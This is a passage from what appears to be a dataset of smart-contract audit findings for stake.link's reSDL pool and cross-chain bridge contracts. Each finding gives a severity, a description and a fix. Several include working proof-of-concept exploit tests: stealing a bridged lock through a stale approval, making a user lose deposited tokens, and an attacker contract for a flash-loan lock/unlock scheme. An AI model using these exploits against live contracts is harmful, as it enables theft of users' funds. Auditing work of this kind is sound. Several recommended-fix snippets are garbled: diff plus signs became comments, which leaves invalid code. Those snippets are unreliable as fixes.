}\\n```\\n\\nhttps://etherscan.io/address/0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419#code\\nThe code segment extracted from the ETH/USD Chainlink aggregator above highlights the composite structure of `roundId`, integrating both `phaseId` and aggregatorRoundId. As highlighted, an increment in `phaseId` leads to a substantial leap in `roundId by 2^64`, thereby bypassing a number of ""rounds."" Consequently, any attempt to query currentRound - 1 post-upgrade encounters a non-existent round, triggering a revert. 
This condition could persist up to 24 hours based on configuration, impacting the timely execution of getEthUsdTwap and getEthUsdPrice.\\nThese functions, once operational again, might utilize altered TWAP values for computations, diverging from expected outcomes",Check return values of roundId. If the `roundID` is a nonzero value and is reverting then the oracle needs to try again with a lower `phaseId.`,"If a `phaseID` increment occurs, it results in a jump in ``````roundID values, creating a gap in the sequence. When there are attempts to access round data for `roundIDs` within this gap, it will encounter inaccurate rounds, potentially causing the function to fail or return incorrect data, considering when the `phaseID` is incremented the `roundID increases by 2 ** 64.` This discrepancy can lead to a denial-of-servicein any calls to the oracle.","```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n" +A user can steal an already transfered and bridged reSDL lock because of approval,high,"The reSDL token approval is not deleted when the lock is bridged to an other chain\\nWhen a reSDL token is bridged to an other chain, the `handleOutgoingRESDL()` function is called to make the state changes into the `sdlPool` contract. 
The function executes the following:\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n\\nAs we can see, it deletes the lock.amount of the lockId, removes the ownership of the lock and decrements the lock balance of the account that is bridging the lock. The approval that the user had before bridging the reSDL lock will remain there and he can get benefited from it by stealing the NFT. Consider the following situation: A user knows that there is a victim that is willing to pay the underlying value for a reSDL lock ownership transfer. What the malicious user can do is set approval to move his lockId in all supported chains to an alt address that he owns. Then, he trades the underlying value for the reSDL ownership and the lock is transfered to the victim/buyer. 
If the buyer keeps the lock in this chain nothing happens, but if he bridges any of the other supported chains, the malicious user can use the approval of his alt account to steal the reSDL lock.\\nIt is written inside `resdl-token-bridge.test.ts` because it uses its setup\\n```\\n it('PoC steal reSDL', async () => {\\n let lockId = 2\\n\\n let thief = accounts[0]\\n let victim = accounts[1]\\n\\n let thiefAccount2 = accounts[2]\\n\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n // Thief approves an alt account that he controls to move his lock in the original chain\\n await sdlPool.approve(thiefAccount2, lockId)\\n\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief bridges the lock to an other chain but the approval is not deleted\\n await bridge.transferRESDL(77, victim, lockId, true, toEther(10), { value: toEther(10) })\\n let lastRequestMsg = await onRamp.getLastRequestMessage()\\n assert.deepEqual(\\n ethers.utils.defaultAbiCoder\\n .decode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n lastRequestMsg[1]\\n )\\n .map((d, i) => {\\n if (i == 0) return d\\n if (i > 1 && i < 4) return fromEther(d)\\n return d.toNumber()\\n }),\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n )\\n assert.deepEqual(\\n lastRequestMsg[2].map((d) => [d.token, fromEther(d.amount)]),\\n [[sdlToken.address, 1000]]\\n )\\n assert.equal(lastRequestMsg[3], wrappedNative.address)\\n assert.equal(lastRequestMsg[4], '0x11')\\n await expect(sdlPool.ownerOf(lockId)).to.be.revertedWith('InvalidLockId()')\\n\\n // The user that received the lock from bridging on the other chain decides to bridge the lock id\\n // back to the original chain\\n await offRamp\\n .connect(signers[6])\\n .executeSingleMessage(\\n ethers.utils.formatBytes32String('messageId'),\\n 77,\\n ethers.utils.defaultAbiCoder.encode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 
'uint64'],\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n ),\\n sdlPoolCCIPController.address,\\n [{ token: sdlToken.address, amount: toEther(25) }]\\n )\\n\\n\\n // Now the victim owns the reSDL lock on the original chain\\n assert.equal(await sdlPool.ownerOf(2), victim)\\n\\n // However, this lockId has the approval that originally the thief set to his alt account and victim do not know that\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief transfers back to his main account the reSDL via his alt account\\n await sdlPool\\n .connect(signers[2])\\n .transferFrom(victim, thief, lockId)\\n\\n // Thief is now the owner of the reSDL\\n assert.equal(await sdlPool.ownerOf(2), thief)\\n })\\n```\\n","When bridging a lock between chains, the lock approval should be deleted.\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n \\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n// Add the line below\\n delete tokenApprovals[_lockId];\\n\\n uint256 totalAmount = lock.amount // Add the line below\\n lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] // Add the line below\\n= totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n","High, possibility to steal funds","```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete 
lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n" +Insufficient Gas Limit Specification for Cross-Chain Transfers in _buildCCIPMessage() method. WrappedTokenBridge.sol #210,low,"The _buildCCIPMessage() function in the WrappedTokenBridge contract does not specify a gasLimit for the execution of the ccipReceive() function on the destination blockchain. This omission can lead to unpredictable gas costs and potential failure of the message processing due to out-of-gas errors.\\nThe Client.EVM2AnyMessage struct created by _buildCCIPMessage() is used to define the details of a cross-chain message, including the tokens to be transferred and the receiver's address. However, the struct lacks a gasLimit field in the extraArgs, which is crucial for determining the maximum amount of gas that can be consumed when the ccipReceive() function is called on the destination chain.\\nWithout a specified gasLimit, the default gas limit set by the CCIP router or the destination chain's infrastructure is used. 
This default may not align with the actual gas requirements of the ccipReceive() function, potentially leading to failed transactions or higher-than-expected fees.\\n` function _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({token: address(wrappedToken), amount: _amount}); tokenAmounts[0] = tokenAmount;\\n```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: """",\\n tokenAmounts: tokenAmounts,\\n extraArgs: ""0x"",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n\\n`","To address the issue of not including a gasLimit in the _transferTokens method, we can take inspiration from the sendMessage() example and modify the _buildCCIPMessage function within the WrappedTokenBridge contract to include a gasLimit in the extraArgs field of the EVM2AnyMessage struct. 
This will ensure that the CCIP message sent to the destination blockchain includes a specified maximum amount of gas that can be consumed during the execution of the ccipReceive() function.\\nfunction _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({ token: address(wrappedToken), amount: _amount }); tokenAmounts[0] = tokenAmount;\\n// // Include a gasLimit in the extraArgs Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({ receiver: abi.encode(_receiver), data: """", tokenAmounts: tokenAmounts, extraArgs: Client._argsToBytes( Client.EVMExtraArgsV1({gasLimit: 200_000, strict: false}) // Additional arguments, setting gas limit and non-strict sequency mode ), feeToken: _feeTokenAddress });\\n```\\nreturn evm2AnyMessage;\\n```\\n\\n}\\nIncludes a gasLimit field, which is set to 200,000 in this example. This value should be adjusted based on the expected gas consumption of the ccipReceive() function on the destination chain. 
By including the gasLimit in the extraArgs, you ensure that the CCIP message has a specified maximum gas limit for execution, which can prevent out-of-gas errors and control the cost of the cross-chain transfer.","If the default gas limit is too low, the ccipReceive() function may run out of gas, causing the transaction to fail on the destination chain.\\nWithout a specified gasLimit, the cost of sending a message can vary, making it difficult for users to predict the required fees.\\nIf the default gas limit is higher than necessary, users may overpay for gas that is not used, as unspent gas is not refunded.","```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: """",\\n tokenAmounts: tokenAmounts,\\n extraArgs: ""0x"",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n" +Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.,low,"`Ownable` contains a function named `renounceOwnership()` which can be used to remove the ownership of contracts in a protocol.\\nThis can lead to `SDLPoolCCIPControllerPrimary`, `SDLPoolCCIPControllerPrimary`, `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts becoming disowned, which will then break critical functions of the protocol.\\nThe `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts inherit from `Ownable`, `SDLPoolCCIPControllerPrimary` from `SDLPoolCCIPController` which inherits `Ownable`, and `SDLPoolCCIPControllerSecondary` inherits from SDLPoolCCIPControllerPrimary; and hence inherit `renounceOwnership()` function.\\nThe owner could accidentally (or intentionally) call `renounceOwnership()` which transfers ownership to `address(0)`. This will break numerous functions within each contract referenced that has the `onlyOwner()` modifier assigned. 
Below are a list of those functions:\\n`SDLPoolCCIPControllerPrimary`\\n`setRewardsInitiator()`\\n`setWrappedRewardToken()`\\n`approveRewardTokens()`\\n`removeWhitelistedChain()`\\n`addWhitelistedChain()`\\n`SDLPoolCCIPControllerSecondary`\\n`setExtraArgs()`\\n`WrappedTokenBridge`\\n`recoverTokens()`\\n`transferTokens()`\\n`LinearBoostController`\\n`setMaxLockingDuration()`\\n`setMaxBoost()`\\n`RESDLTokenBridge`.\\n`setExtraArgs()`\\nPOC\\nAdd this test to `test/core/ccip/sdl-pool-ccip-controller-primary.test.ts`\\n```\\n it.only('renounce ownership', async () => {\\n console.log(""Owner before"", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(""Set max link fee with onlyOwner modifier"", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(""set max link fee hasn't changed"", await controller.maxLINKFee())\\n // console out the owner\\n console.log(""Owner after"", await controller.owner())\\n \\n })\\n```\\n","Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.\\nDisable `renounceOwnership()` if function in the Ownable contract not required.\\n```\\n// Add the line below\\n function renounceOwnership() public override onlyOwner {\\n// Add the line below\\n revert (""Not allowed"");\\n// Add the line below\\n }\\n```\\n",,"```\\n it.only('renounce ownership', async () => {\\n console.log(""Owner before"", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(""Set max link fee with onlyOwner modifier"", await controller.maxLINKFee())\\n \\n 
// renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(""set max link fee hasn't changed"", await controller.maxLINKFee())\\n // console out the owner\\n console.log(""Owner after"", await controller.owner())\\n \\n })\\n```\\n" +No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.,medium,"There is no way to revoke the approval which given via the approvefunction They may able execute transfers even after the owner revokes their permission using the `setApprovalForAll` function.\\nThe `setApprovalForAll` function allows the owner to approve anyone as the operator.\\n```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n\\nIn the same vein, the `approve` function allows the owner or operator to `approve` anyone to transfer the lock.\\n```\\n function approve(address _to, uint256 _lockId) external {\\n address owner = ownerOf(_lockId);\\n\\n if (_to == owner) revert ApprovalToCurrentOwner(); //@note\\n if (msg.sender != owner && !isApprovedForAll(owner, msg.sender)) revert SenderNotAuthorized();\\n\\n tokenApprovals[_lockId] = _to;\\n emit Approval(owner, _to, _lockId);\\n }\\n```\\n\\nNote that in the function, lock cannot be approved to the owner (but can be approved to any of the operators), and can be called by the owner/operator (see the `isApprovedForAll` modifier).\\nIf the operator approves himself to the lock, using the `approve` function, and later on, his operator status gets revoked, his lock approval status is not cleared, 
meaning he still has access to the lock.\\nAs an extreme example\\nUser1 owns 5 locks.\\nHe calls the `setApprovalForAll` setting User2 as his operator.\\nUser2 calls the `approve` function on all 5 locks (It succeeds as there's no check preventing this unlike with the lock owner), getting herself both operator approval and token approvals.\\nUser1 revokes User2's operator status.\\nUser2 still has access to the locks and can transfer them.","No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.\\nInclude a check to see if the `_to` in the `approve` function is an operator, revert if it is. Or clear an operator's token approvals after revoking his operator status.","Uncleared approval, gives access to transfer token.","```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n" +A user can lose funds in `sdlPoolSecondary` if tries to add more sdl tokens to a lock that has been queued to be completely withdrawn,medium,"In a secondary chain, if a user adds more sdl amount into a lock that he has queued to withdraw all the amount in the same index batch, he will lose the extra amount he deposited\\nThe process to withdraw all the funds from a lock in a primary chain is just by calling withdraw with all the base amount of the lock. At this point the user will get immediately his funds back and the lock will be deleted, hence the owner will be zero address.\\nHowever, in a secondary chain, a user has to queue a withdraw of all the funds and wait for the keeper to send the update to the primary chain to execute the updates and then receive his sdl token back. 
In this period of time when the keeper does not send the update to the primary chain, if a user queues a withdraw of all the lock base amount, he will still own the lock because the withdraw has not been executed, just queued. So the user can still do whatever modification in his lock, for example, increase his lock base amount by calling `transferAndCall()` in the `sdlToken` passing the address of the `sdlSecondaryPool` as argument.\\nIf this happens, when the keeper send the update to the primary chain and the user executes the updates for his lockId, he will lose this extra amount he deposited because it will execute the updates in order, and it will start with the withdraw of all the funds, will delete the ownership (make the zero address as the owner), and then increase the base amount of the lock that now owns the zero address.\\nAnd basically the lockId will be owned by the zero address with base amount as the extra sdl tokens that the user sent.\\nIt is written inside `sdl-pool-secondary.test.ts` because it uses its setup\\n```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n 
ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(""The user has lost"", sdlLost.toString(), ""sdl tokens"")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n\\nOutput:\\n```\\n SDLPoolSecondary\\nThe user has lost 1000000000000000000000 sdl tokens\\n ✔ PoC user is not able to execute his lock updates (159ms)\\n\\n\\n 1 passing (3s)\\n```\\n","When trying to do any action on a lock in a secondary pool, check if the last update queued has not 0 as the base amount. 
Because if it is the case, that would mean that the user queued a withdraw of all funds and he will lose ownership of the lock at the next keeper update.\\n```\\n function _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n ) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n// Add the line below\\n if(lock.amount == 0) revert();\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange // Add the line below\\n=\\n int256(lockUpdate.lock.amount // Add the line below\\n lockUpdate.lock.boostAmount) -\\n int256(lock.amount // Add the line below\\n lock.boostAmount);\\n if (updateNeeded == 0) updateNeeded = 1;\\n\\n emit QueueUpdateLock(_owner, _lockId, lockUpdate.lock.amount, lockUpdate.lock.boostAmount, lockUpdate.lock.duration);\\n }\\n```\\n","High, user will lose funds","```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 
'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(""The user has lost"", sdlLost.toString(), ""sdl tokens"")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n" +Can lock Fund for 1 sec and unlock in same transaction to gain profit,low,"Can lock Fund for 1 sec and unlock in same transaction to gain profit even if it's small amount yet there's no flashloan protection so malicious user can flashloan big amount and sandwich the rebasing upkeep to take advantage of the pool with dividing leads to zero problem to gain profit from pool.This way totalstaked amount can be manupilated. 
Checkupkeep and performUkeep completely user accessible so totalstake amount can change for the favor of malicious user\\n\\n```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n\\n```\\n import { Signer } from 'ethers'\\nimport { assert, expect } from 'chai'\\nimport {\\n toEther,\\n deploy,\\n getAccounts,\\n setupToken,\\n fromEther,\\n deployUpgradeable,\\n} from '../../utils/helpers'\\nimport {\\n ERC677,\\n LinearBoostController,\\n RewardsPool,\\n SDLPoolPrimary,\\n StakingAllowance,\\n Attacker\\n} from '../../../typechain-types'\\nimport { ethers } from 'hardhat'\\nimport { time } from '@nomicfoundation/hardhat-network-helpers'\\n//1 day in seconds// rest of code\\nconst DAY = 86400\\n\\n// parsing Lock struct in contracts// rest of code\\nconst parseLocks = (locks: any) =>\\n locks.map((l: any) => ({\\n amount: fromEther(l.amount),\\n //show 4 digits after decimal// rest of code\\n boostAmount: Number(fromEther(l.boostAmount).toFixed(10)),\\n startTime: l.startTime.toNumber(),\\n duration: l.duration.toNumber(),\\n expiry: l.expiry.toNumber(),\\n }))\\n\\n const parseData=(data:any)=>({\\n operator:data.operator,\\n from:data.from,\\n tokenId:data.tokenId,\\n data: Buffer.from(data.data.slice(2), 'hex').toString('utf8')\\n })\\n\\ndescribe('SDLPoolPrimary', () => {\\n let sdlToken: StakingAllowance\\n let rewardToken: ERC677\\n let rewardsPool: RewardsPool\\n let boostController: LinearBoostController\\n let sdlPool: SDLPoolPrimary\\n let signers: Signer[]\\n let accounts: string[]\\n let attacker:Attacker\\n before(async () => {\\n ;({ signers, accounts } = await getAccounts())\\n })\\n\\n beforeEach(async () => {\\n sdlToken = (await deploy('StakingAllowance', ['stake.link', 'SDL'])) as StakingAllowance\\n rewardToken = (await deploy('ERC677', ['Chainlink', 'LINK', 1000000000])) as ERC677\\n\\n await sdlToken.mint(accounts[0], toEther(1000000))\\n await setupToken(sdlToken, accounts)\\n\\n boostController 
= (await deploy('LinearBoostController', [\\n 4 * 365 * DAY,\\n 4,\\n ])) as LinearBoostController\\n\\n sdlPool = (await deployUpgradeable('SDLPoolPrimary', [\\n 'Reward Escrowed SDL',\\n 'reSDL',\\n sdlToken.address,\\n boostController.address,\\n ])) as SDLPoolPrimary\\n\\n rewardsPool = (await deploy('RewardsPool', [\\n sdlPool.address,\\n rewardToken.address,\\n ])) as RewardsPool\\n\\n await sdlPool.addToken(rewardToken.address, rewardsPool.address)\\n await sdlPool.setCCIPController(accounts[0])\\n //attack contract deployment -- setting bridge contract to same we wont need ccip here\\n attacker=await deploy(""Attacker"",[sdlPool.address,sdlPool.address,sdlToken.address]) as Attacker\\n await sdlToken.transfer(attacker.address,toEther(20000))\\n const sender = signers[0] // or choose any unlocked account\\n const valueToSend = ethers.utils.parseEther(""100"") // Amount of Ether to send\\n const tx = await sender.sendTransaction({\\n to: attacker.address,\\n value: valueToSend,\\n });\\n \\n await tx.wait();\\n console.log(""Funded contract!"");\\n })\\n it('should be able to lock an existing stake', async () => {\\n //with flashloan this may prove fatal// rest of code\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(10000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n await sdlPool.extendLockDuration(1, 365 * DAY)\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 200)\\n assert.equal(fromEther(await sdlPool.totalStaked()), 200)\\n assert.equal(fromEther(await sdlPool.effectiveBalanceOf(accounts[0])), 200)\\n assert.equal(fromEther(await sdlPool.staked(accounts[0])), 200)\\n assert.deepEqual(parseLocks(await sdlPool.getLocks([1])), [\\n { amount: 100, boostAmount: 100, startTime: ts, duration: 365 * DAY, expiry: 0 },\\n ])\\n\\n // Move one block forward\\n //await ethers.provider.send('evm_mine', 
[]);\\n //console.log(""Parsed lock :"",parseLocks(await sdlPool.getLocks([1])))\\n })\\n //@audit NFT onERC721receiver doesnt work it seems..\\n it('usage of Attack contract and receiving NFT', async () => {\\n console.log(""Block-number before tx:"",await ethers.provider.getBlockNumber())\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n // Move one block forward\\n await ethers.provider.send('evm_mine', [ts+1]);\\n console.log(""SDLToken balance Before:"",await sdlToken.balanceOf(attacker.address))\\n await attacker.attackTransfernCall()\\n console.log(""Lock"",parseLocks(await sdlPool.getLocks([1])))\\n console.log(""Block-number after tx:"",await ethers.provider.getBlockNumber())\\n console.log(""Nft received ??:"",await attacker.received());\\n//boostAmount: 0.0006341958 20_000 -> with flashloan\\n//boostAmount: 0.000006342 200 \\n })\\n})\\n```\\n",Setting lower-limit of locking time to stop bypassing 1 transaction lock-unlock-withdraw .This way it might stop the flashloan attacks too. Preferable minimum 1 day.,Loss of pool reward gained by rebasing.,```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n +Attacker can exploit lock update logic on secondary chains to increase the amount of rewards sent to a specific secondary chain,medium,"Users with existing reSDL NFTs on secondary chains (prior to a decrease in maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain (as `queuedRESDLSupplyChange` maps to `reSDLSupplyByChain[...]`, which is used to calculate the rewards distributed to each secondary chain).\\nConsider the scenario in which the stake.link team is decreasing the `maxBoost` value of the `LinearBoostController` so that newer depositors will get less rewards than OG depositors. 
This will allow an attacker on a secondary chain to perform the following attack to fraudulently increase the amount of rewards sent to their chain:\\nWe will assume for simplicity that the starting values for the `LinearBoostController` contract is a maxBoost=10 and `maxLockingDuration` = 10_000 seconds. The attacker starts with a single (for simplicity) reSDL NFT on a secondary chain which has amount=100_000 and lockingDuration= 5_000 seconds, meaning their boost is calculated to be: 100_000 * 10 * 5_000/10_000 = 500_000.\\nThen, the stake.link team decreases `maxBoost` to 5. Following this, the attacker will first call `SDLPoolSecondary:extendLockDuration` with a `_lockingDuration` of 9_999, which then calls the internal `_queueLockUpdate`, which is defined as follows:\\n```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n\\nAs part of this function call, `_updateLock` is triggered to perform this update, which is defined as follows:\\n```\\nfunction _updateLock(\\n Lock memory _lock,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal view returns (Lock memory) {\\n if ((_lock.expiry == 0 || _lock.expiry > block.timestamp) && _lockingDuration < _lock.duration) {\\n revert InvalidLockingDuration();\\n }\\n\\n Lock memory lock = Lock(_lock.amount, _lock.boostAmount, _lock.startTime, _lock.duration, _lock.expiry);\\n\\n uint256 baseAmount = _lock.amount + _amount;\\n uint256 boostAmount = boostController.getBoostAmount(baseAmount, _lockingDuration);\\n\\n // rest of 
code\\n lock.boostAmount = boostAmount;\\n // rest of code\\n}\\n```\\n\\nMost important to note here is that (1) since the `_lockingDuration` of 9_999 is greater than the existing duration of 5_000, this call will succeed, and (2) the `boostAmount` is recalculated now using the new `maxBoost` value of 5. We can calculate the new attacker's `boostAmount` to be: 100_000 * 5 * 9_999/10_000 = 499_950. Since this value is less than the previous 500_000, `queuedRESDLSupplyChange` in the `_queueLockUpdate` call will be decremented by 50.\\nAfter the `SDLPoolSecondary:extendLockDuration` function call is complete, this update will be queued. At some point an update to this secondary SDL pool will be triggered & once that's complete, the attacker will then be able to execute this update. To do so, the attacker calls `executeQueuedOperations`, specifying their reNFT, which then triggers `_executeQueuedLockUpdates` which has the following logic:\\n```\\n// rest of code\\nuint256 numUpdates = queuedLockUpdates[lockId].length;\\n\\nLock memory curLockState = locks[lockId];\\nuint256 j = 0;\\nwhile (j < numUpdates) {\\n if (queuedLockUpdates[lockId][j].updateBatchIndex > finalizedBatchIndex) break;\\n\\n Lock memory updateLockState = queuedLockUpdates[lockId][j].lock;\\n int256 baseAmountDiff = int256(updateLockState.amount) - int256(curLockState.amount);\\n int256 boostAmountDiff = 